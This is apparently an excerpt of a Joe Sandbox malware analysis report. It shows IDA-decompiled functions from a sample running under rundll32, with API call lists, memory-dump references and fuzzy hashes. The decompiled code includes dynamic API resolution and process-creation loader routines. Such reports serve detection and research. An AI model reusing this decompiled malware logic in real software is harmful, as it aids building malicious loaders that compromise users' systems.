						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E04F49039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E04F485DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04F49039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                  0x04f48b94
                                                  0x04f48b94
                                                  0x04f48b94
                                                  0x04f48b9f
                                                  0x04f48ba6
                                                  0x04f48ba8
                                                  0x04f48ba8
                                                  0x04f48bb5
                                                  0x04f48bc0
                                                  0x04f48bc3
                                                  0x04f48bc8
                                                  0x04f48bd1
                                                  0x04f48bd4
                                                  0x04f48bd9
                                                  0x04f48bdc
                                                  0x04f48be1
                                                  0x04f48be4
                                                  0x04f48bf0
                                                  0x04f48bfd
                                                  0x04f48bff
                                                  0x04f48c05
                                                  0x04f48c0a
                                                  0x04f48c15
                                                  0x04f48c17
                                                  0x04f48c1a
                                                  0x04f48c1c
                                                  0x04f48c23
                                                  0x04f48c29
                                                  0x04f48c2c
                                                  0x04f48c2f
                                                  0x04f48c34
                                                  0x04f48c41
                                                  0x04f48c43
                                                  0x04f48c49
                                                  0x04f48c53
                                                  0x04f48c53
                                                  0x04f48c55
                                                  0x04f48c5c
                                                  0x04f48c5f
                                                  0x04f48c62
                                                  0x04f48c67
                                                  0x04f48c74
                                                  0x04f48c76
                                                  0x04f48c84
                                                  0x04f48c84
                                                  0x04f48c86
                                                  0x04f48c94
                                                  0x04f48c99
                                                  0x04f48c9d
                                                  0x04f48ca0
                                                  0x04f48e63
                                                  0x04f48e6d
                                                  0x04f48e76
                                                  0x04f48ca6
                                                  0x04f48cb2
                                                  0x04f48cba
                                                  0x04f48cbd
                                                  0x04f48e57
                                                  0x04f48e61
                                                  0x00000000
                                                  0x04f48e61
                                                  0x04f48cc9
                                                  0x04f48cce
                                                  0x04f48cd7
                                                  0x04f48ce8
                                                  0x04f48cec
                                                  0x04f48cf5
                                                  0x04f48cfb
                                                  0x04f48d0a
                                                  0x04f48d11
                                                  0x04f48d1a
                                                  0x04f48d20
                                                  0x04f48e4b
                                                  0x04f48e55
                                                  0x00000000
                                                  0x04f48e55
                                                  0x04f48d2c
                                                  0x04f48d32
                                                  0x04f48d33
                                                  0x04f48d3a
                                                  0x04f48d3d
                                                  0x04f48e41
                                                  0x04f48e49
                                                  0x00000000
                                                  0x04f48e49
                                                  0x04f48d46
                                                  0x04f48d4d
                                                  0x04f48d55
                                                  0x04f48d5a
                                                  0x04f48d63
                                                  0x04f48d69
                                                  0x04f48d70
                                                  0x04f48d77
                                                  0x04f48d7a
                                                  0x04f48e79
                                                  0x04f48e2d
                                                  0x04f48e2d
                                                  0x04f48e32
                                                  0x04f48e3d
                                                  0x04f48e3f
                                                  0x00000000
                                                  0x04f48e3f
                                                  0x04f48d84
                                                  0x04f48d8b
                                                  0x04f48d8e
                                                  0x04f48d93
                                                  0x04f48da3
                                                  0x04f48da6
                                                  0x04f48dac
                                                  0x04f48db2
                                                  0x04f48db8
                                                  0x04f48dbb
                                                  0x04f48dc1
                                                  0x04f48dc4
                                                  0x04f48dc9
                                                  0x04f48dcd
                                                  0x04f48dcd
                                                  0x04f48dd9
                                                  0x04f48de5
                                                  0x04f48de9
                                                  0x04f48deb
                                                  0x04f48df0
                                                  0x04f48df2
                                                  0x04f48df7
                                                  0x04f48dfc
                                                  0x04f48e09
                                                  0x04f48e11
                                                  0x04f48e14
                                                  0x04f48e14
                                                  0x04f48df0
                                                  0x00000000
                                                  0x04f48ddb
                                                  0x04f48ddf
                                                  0x04f48e16
                                                  0x04f48e19
                                                  0x04f48e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f48e22
                                                  0x04f48de1
                                                  0x00000000
                                                  0x04f48de1
                                                  0x04f48dd9

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04F48BA8
                                                  • wsprintfA.USER32 ref: 04F48BF8
                                                  • wsprintfA.USER32 ref: 04F48C15
                                                  • wsprintfA.USER32 ref: 04F48C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48C53
                                                  • wsprintfA.USER32 ref: 04F48C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F48CB2
                                                  • GetTickCount.KERNEL32 ref: 04F48CC3
                                                  • RtlEnterCriticalSection.NTDLL(07079570), ref: 04F48CD7
                                                  • RtlLeaveCriticalSection.NTDLL(07079570), ref: 04F48CF5
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04F4A428,?,070795B0), ref: 04F48332
                                                    • Part of subcall function 04F48307: lstrlen.KERNEL32(?,?,?,04F4A428,?,070795B0), ref: 04F4833A
                                                    • Part of subcall function 04F48307: strcpy.NTDLL ref: 04F48351
                                                    • Part of subcall function 04F48307: lstrcat.KERNEL32(00000000,?), ref: 04F4835C
                                                    • Part of subcall function 04F48307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F4A428,?,070795B0), ref: 04F48379
                                                  • StrTrimA.SHLWAPI(00000000,04F4C2AC,?,070795B0), ref: 04F48D2C
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(070787FA,00000000,00000000,74ECC740,04F4A453,00000000), ref: 04F43CD8
                                                    • Part of subcall function 04F43CC8: lstrlen.KERNEL32(?), ref: 04F43CE0
                                                    • Part of subcall function 04F43CC8: lstrcpy.KERNEL32(00000000,070787FA), ref: 04F43CF4
                                                    • Part of subcall function 04F43CC8: lstrcat.KERNEL32(00000000,?), ref: 04F43CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04F48D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 04F48D55
                                                  • lstrcat.KERNEL32(?,?), ref: 04F48D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 04F48D69
                                                    • Part of subcall function 04F4809F: lstrlen.KERNEL32(?,00000000,04F4D330,00000001,04F42200,04F4D00C,04F4D00C,00000000,00000005,00000000,00000000,?,?,?,04F496C1,04F423E9), ref: 04F480A8
                                                    • Part of subcall function 04F4809F: mbstowcs.NTDLL ref: 04F480CF
                                                    • Part of subcall function 04F4809F: memset.NTDLL ref: 04F480E1
                                                  • wcstombs.NTDLL ref: 04F48DFC
                                                    • Part of subcall function 04F4163F: SysAllocString.OLEAUT32(?), ref: 04F41680
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 04F48E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F48E49
                                                  • HeapFree.KERNEL32(00000000,?,?,070795B0), ref: 04F48E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04F48E6D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 4843c8ba76e14edf33dc7dfe3909927fed46e4dccc31d055cccccd3bc53366ee
                                                  • Instruction ID: 41bc7720c9db3e4dbe22e40ad6bc265ddc3242c78dde5f61627cbf3408eefed7
                                                  • Opcode Fuzzy Hash: 4843c8ba76e14edf33dc7dfe3909927fed46e4dccc31d055cccccd3bc53366ee
                                                  • Instruction Fuzzy Hash: E1912979901108AFDB11EFA8EC44AAA7FB9EF88354F144055F904D7250DF39EE52DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4ADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E04F4ADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4f40000;
				_t115 = _t139[3] + 0x4f40000;
				_t131 = _t139[4] + 0x4f40000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4f40000;
				_v16 = _t139[5] + 0x4f40000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4f40002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4f4d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4f4d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4f4d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4f4d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4f4d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4f4d198; // 0x0
										 *_t102 = _t125;
										 *0x4f4d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4f4d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                                  0x04f4adf4
                                                  0x04f4ae0a
                                                  0x04f4ae10
                                                  0x04f4ae12
                                                  0x04f4ae17
                                                  0x04f4ae1d
                                                  0x04f4ae22
                                                  0x04f4ae25
                                                  0x04f4ae33
                                                  0x04f4ae3a
                                                  0x04f4ae3d
                                                  0x04f4ae40
                                                  0x04f4ae41
                                                  0x04f4ae44
                                                  0x04f4ae47
                                                  0x04f4ae4a
                                                  0x04f4ae4f
                                                  0x04f4ae5e
                                                  0x00000000
                                                  0x04f4ae64
                                                  0x04f4ae6e
                                                  0x04f4ae78
                                                  0x04f4ae7d
                                                  0x04f4ae7f
                                                  0x04f4ae89
                                                  0x04f4ae8c
                                                  0x04f4ae8f
                                                  0x04f4ae95
                                                  0x04f4ae97
                                                  0x04f4ae97
                                                  0x04f4ae9a
                                                  0x04f4ae9d
                                                  0x04f4aea2
                                                  0x04f4aea6
                                                  0x04f4aeb9
                                                  0x04f4aebb
                                                  0x04f4af63
                                                  0x04f4af63
                                                  0x04f4af6a
                                                  0x04f4af6d
                                                  0x04f4af77
                                                  0x04f4af77
                                                  0x04f4af7b
                                                  0x04f4aff9
                                                  0x04f4affc
                                                  0x04f4affe
                                                  0x04f4affe
                                                  0x04f4b005
                                                  0x04f4b007
                                                  0x04f4b011
                                                  0x04f4b014
                                                  0x04f4b017
                                                  0x04f4b017
                                                  0x00000000
                                                  0x04f4af7d
                                                  0x04f4af80
                                                  0x04f4afae
                                                  0x04f4afb8
                                                  0x04f4afbc
                                                  0x04f4afc4
                                                  0x04f4afc7
                                                  0x04f4afce
                                                  0x04f4afd8
                                                  0x04f4afd8
                                                  0x04f4afdc
                                                  0x04f4afe1
                                                  0x04f4aff0
                                                  0x04f4aff6
                                                  0x04f4aff6
                                                  0x04f4afdc
                                                  0x00000000
                                                  0x04f4af87
                                                  0x04f4af8a
                                                  0x04f4af92
                                                  0x04f4afa7
                                                  0x04f4afac
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4afac
                                                  0x00000000
                                                  0x04f4af92
                                                  0x04f4af80
                                                  0x04f4af7b
                                                  0x04f4aec1
                                                  0x04f4aec8
                                                  0x04f4aed8
                                                  0x04f4aee1
                                                  0x04f4aee5
                                                  0x04f4af28
                                                  0x04f4af34
                                                  0x04f4af5d
                                                  0x04f4af36
                                                  0x04f4af3a
                                                  0x04f4af40
                                                  0x04f4af48
                                                  0x04f4af4a
                                                  0x04f4af4d
                                                  0x04f4af53
                                                  0x04f4af55
                                                  0x04f4af55
                                                  0x04f4af48
                                                  0x04f4af3a
                                                  0x00000000
                                                  0x04f4af34
                                                  0x04f4aeed
                                                  0x04f4aef0
                                                  0x04f4aef7
                                                  0x04f4af07
                                                  0x04f4af0a
                                                  0x04f4af1a
                                                  0x00000000
                                                  0x04f4af20
                                                  0x04f4af01
                                                  0x04f4af05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4af05
                                                  0x04f4aed2
                                                  0x04f4aed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4aed6
                                                  0x04f4aeaf
                                                  0x04f4aeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04F4AE5E
                                                  • LoadLibraryA.KERNEL32(?), ref: 04F4AEDB
                                                  • GetLastError.KERNEL32 ref: 04F4AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04F4AF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: c565425d2a030ce61fc175c70c42e5844e9168d404805cf6363787b2ab97c7b6
                                                  • Instruction ID: ce37d9811e606537425a4cd2d8c2c0b9d9ed7b8f195872437d8ddbebbc2f313d
                                                  • Opcode Fuzzy Hash: c565425d2a030ce61fc175c70c42e5844e9168d404805cf6363787b2ab97c7b6
                                                  • Instruction Fuzzy Hash: 75813CB5E40209AFDB14CFA9D880AADBBF5EF98314F158029E915D7340EF74E946CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
                                                  			E04F4816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x4f4d33c; // 0x7079bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04F470F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x4f4c1ac;
				}
				_t46 = E04F48022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04F42049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x4f4d27c; // 0x212a5a8
						_t16 = _t75 + 0x4f4eb28; // 0x530025
						 *0x4f4d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04F470F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x4f4c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04F42049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04F49039(_v20);
						} else {
							_t66 =  *0x4f4d27c; // 0x212a5a8
							_t31 = _t66 + 0x4f4ec48; // 0x73006d
							 *0x4f4d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04F49039(_v12);
				}
				return _v24;
			}




























                                                  0x04f48174
                                                  0x04f4817a
                                                  0x04f48181
                                                  0x04f48187
                                                  0x04f4818b
                                                  0x04f4818f
                                                  0x04f48192
                                                  0x04f48199
                                                  0x04f4819c
                                                  0x04f4819e
                                                  0x04f4819e
                                                  0x04f481a7
                                                  0x04f481ae
                                                  0x04f481b1
                                                  0x04f481b7
                                                  0x04f481c1
                                                  0x04f481ca
                                                  0x04f481d1
                                                  0x04f481ea
                                                  0x04f481f1
                                                  0x04f481f4
                                                  0x04f481fd
                                                  0x04f48206
                                                  0x04f48217
                                                  0x04f48220
                                                  0x04f48224
                                                  0x04f48228
                                                  0x04f4822f
                                                  0x04f48232
                                                  0x04f48234
                                                  0x04f48234
                                                  0x04f4823e
                                                  0x04f48247
                                                  0x04f4824e
                                                  0x04f48266
                                                  0x04f4826a
                                                  0x04f482a7
                                                  0x04f4826c
                                                  0x04f4826f
                                                  0x04f48277
                                                  0x04f48288
                                                  0x04f48294
                                                  0x04f4829c
                                                  0x04f482a0
                                                  0x04f482a0
                                                  0x04f4826a
                                                  0x04f482af
                                                  0x04f482b4
                                                  0x04f482bb

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04F48181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 04F481C1
                                                  • lstrlen.KERNEL32(00000000), ref: 04F481CA
                                                  • lstrlen.KERNEL32(00000000), ref: 04F481D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 04F481DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 04F4823E
                                                  • lstrlen.KERNEL32(?), ref: 04F48247
                                                  • lstrlen.KERNEL32(?), ref: 04F4824E
                                                  • lstrlenW.KERNEL32(?), ref: 04F48255
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: 004898b14485ecba77db5163a3b71a75b02144fa8fd18468974720369e350426
                                                  • Instruction ID: 5978ac865aa1bc593cb948bed6cd636208bf49c510743b47409496d5896ad009
                                                  • Opcode Fuzzy Hash: 004898b14485ecba77db5163a3b71a75b02144fa8fd18468974720369e350426
                                                  • Instruction Fuzzy Hash: 56415D76D00119EFDF11AFA8DC04A9EBFB5EF88348F054051ED04A7211DB35AB12EB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E04F4205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04F4692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04F4A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4f4d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4f4d27c; // 0x212a5a8
					_t18 = _t47 + 0x4f4e3e6; // 0x73797325
					_t68 = E04F495B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4f4d27c; // 0x212a5a8
						_t19 = _t50 + 0x4f4e747; // 0x7078cef
						_t20 = _t50 + 0x4f4e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04F484D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04F484D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4f4d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04F49039(_t70);
				goto L12;
			}


















                                                  0x04f42066
                                                  0x04f42066
                                                  0x04f42075
                                                  0x04f4207e
                                                  0x04f42081
                                                  0x04f4218e
                                                  0x04f42195
                                                  0x04f42195
                                                  0x04f42090
                                                  0x04f42098
                                                  0x04f4209d
                                                  0x04f420a0
                                                  0x04f420b5
                                                  0x04f420bb
                                                  0x04f420bc
                                                  0x04f420bf
                                                  0x04f420c5
                                                  0x04f420c8
                                                  0x04f420cd
                                                  0x04f420d5
                                                  0x04f420e1
                                                  0x04f420e5
                                                  0x04f42175
                                                  0x04f420eb
                                                  0x04f420eb
                                                  0x04f420f0
                                                  0x04f420f7
                                                  0x04f4210b
                                                  0x04f4210f
                                                  0x04f4215e
                                                  0x04f42111
                                                  0x04f42112
                                                  0x04f42119
                                                  0x04f42132
                                                  0x04f42134
                                                  0x04f42138
                                                  0x04f4213f
                                                  0x04f42159
                                                  0x04f42141
                                                  0x04f4214a
                                                  0x04f4214f
                                                  0x04f4214f
                                                  0x04f4213f
                                                  0x04f4216d
                                                  0x04f4216d
                                                  0x04f420e5
                                                  0x04f4217c
                                                  0x04f42185
                                                  0x04f42189
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 04F4692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F4207A,?,00000001,?,?,00000000,00000000), ref: 04F46951
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F46973
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F46989
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F4699F
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F469B5
                                                    • Part of subcall function 04F4692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F469CB
                                                  • memset.NTDLL ref: 04F420C8
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04F423E9,63699BCE,04F41354,73797325), ref: 04F495C2
                                                    • Part of subcall function 04F495B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F495DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,07078CEF,73797325), ref: 04F420FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 04F42105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04F4216D
                                                    • Part of subcall function 04F484D5: GetProcAddress.KERNEL32(36776F57,04F421E5), ref: 04F484F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 04F4214A
                                                  • CloseHandle.KERNEL32(?), ref: 04F4214F
                                                  • GetLastError.KERNEL32(00000001), ref: 04F42153
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 73baea2187a44bca484a9753c77dadd1a2b35bc2b2f7b271d98102a492b26cb0
                                                  • Instruction ID: 2ed1332c50120d6b9ea9f550c00accc7d31f7564f731a3b33cfb83adee7cb2e1
                                                  • Opcode Fuzzy Hash: 73baea2187a44bca484a9753c77dadd1a2b35bc2b2f7b271d98102a492b26cb0
                                                  • Instruction Fuzzy Hash: 9E310DB6D0020CAFEB10AFE8DC84D9EBFB8EB88394F014465F615A7111DA75AE469B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

